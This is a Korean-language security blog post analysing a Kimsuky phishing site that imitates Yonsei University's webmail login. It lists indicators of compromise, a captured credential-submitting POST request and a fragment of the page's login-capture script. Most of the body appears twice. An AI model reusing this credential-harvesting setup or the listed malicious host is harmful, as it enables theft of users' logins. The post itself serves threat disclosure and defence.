김수키(Kimsuky)에서 만든 연세대학교 웹메일 피싱 사이트-rfa(.)lol/yonsei(2024.10.8)
Contents
오늘은 김수키(Kimsuky)에서 만든 연세대학교 웹메일 피싱 사이트에 대해 알아보겠습니다. 일단 해당 피싱 사이트 주소만 보면 rfa(자유아시아방송, Radio Free Asia) 관련 되어져 있는 것을 확인할 수가 있습니다.
자유아시아방송은 미국 국제방송청에서 운영하는 방송사 및 이 방송사에서 운영하는 단파방송입니다.
피싱 사이트 주소
hxxps://rfa(.)lol/yonsei
101(.)36(.)114(.)91
정상적인 자유아시아방송은 org 입니다.
인증서 정보: Let's Encrypt
뭐~저는 피싱 사이트 라고 하고 있습니다.
일단 기본적으로 해당 피싱 사이트 에 접속을 하면 다음과 같은 화면을 볼 수가 있습니다.
여기서 물론 해당 화면엔 보는 것처럼 연세대학교 고객센터, 교내문의 전화는 정상적인 것을 당연히 표시해서 자신이 접속한 사이트가 피싱 사이트 인지 모르게 하게 하고 있습니다.여기서 아이디하고 비밀번호를 입력하면 다음과 같이 저장이 되는 것을 확인할 수가 있습니다.
hxxps://rfa(.)lol/yonsei/login(.)php
이며 Raw 값은 다음과 같습니다.
POST /yonsei/login(.)php HTTP/1.1
Host: rfa(.)lol
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Prefer: safe
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Origin: hxxps://rfa(.)lol
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: sidebarFix=Y
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Accept-Encoding: gzip, deflate
Content-Length: 58
username=rlawjddsmTLqtpRl&password=qkqdmsajrrhtksi&count=1
그리고 웹소스를 보면 다음과 같이 돼 있는 것을 확인할 수가 있습니다.
$.ajax({
url: "./login(.)php" ,
method : "POST",
contentType:"application/x-www-form-urlencoded",
data: post_val,
async:false,
timeout:5000,
error:function(xhr, txt){
handle_login_result("..", "F_1", "로그인 <strong>1회</strong> 실패하였습니다.<br>로그인 5회 실패 시 로그인이 …
자유아시아방송은 미국 국제방송청에서 운영하는 방송사 및 이 방송사에서 운영하는 단파방송입니다.
피싱 사이트 주소
hxxps://rfa(.)lol/yonsei
101(.)36(.)114(.)91
정상적인 자유아시아방송은 org 입니다.
인증서 정보: Let's Encrypt
뭐~저는 피싱 사이트 라고 하고 있습니다.
일단 기본적으로 해당 피싱 사이트 에 접속을 하면 다음과 같은 화면을 볼 수가 있습니다.
여기서 물론 해당 화면엔 보는 것처럼 연세대학교 고객센터, 교내문의 전화는 정상적인 것을 당연히 표시해서 자신이 접속한 사이트가 피싱 사이트 인지 모르게 하게 하고 있습니다.여기서 아이디하고 비밀번호를 입력하면 다음과 같이 저장이 되는 것을 확인할 수가 있습니다.
hxxps://rfa(.)lol/yonsei/login(.)php
이며 Raw 값은 다음과 같습니다.
POST /yonsei/login(.)php HTTP/1.1
Host: rfa(.)lol
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Prefer: safe
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Origin: hxxps://rfa(.)lol
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: sidebarFix=Y
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Accept-Encoding: gzip, deflate
Content-Length: 58
username=rlawjddsmTLqtpRl&password=qkqdmsajrrhtksi&count=1
그리고 웹소스를 보면 다음과 같이 돼 있는 것을 확인할 수가 있습니다.
$.ajax({
url: "./login(.)php" ,
method : "POST",
contentType:"application/x-www-form-urlencoded",
data: post_val,
async:false,
timeout:5000,
error:function(xhr, txt){
handle_login_result("..", "F_1", "로그인 <strong>1회</strong> 실패하였습니다.<br>로그인 5회 실패 시 로그인이 …
IoC
https://rfa.lol/yonsei
101.36.114.91
101.36.114.91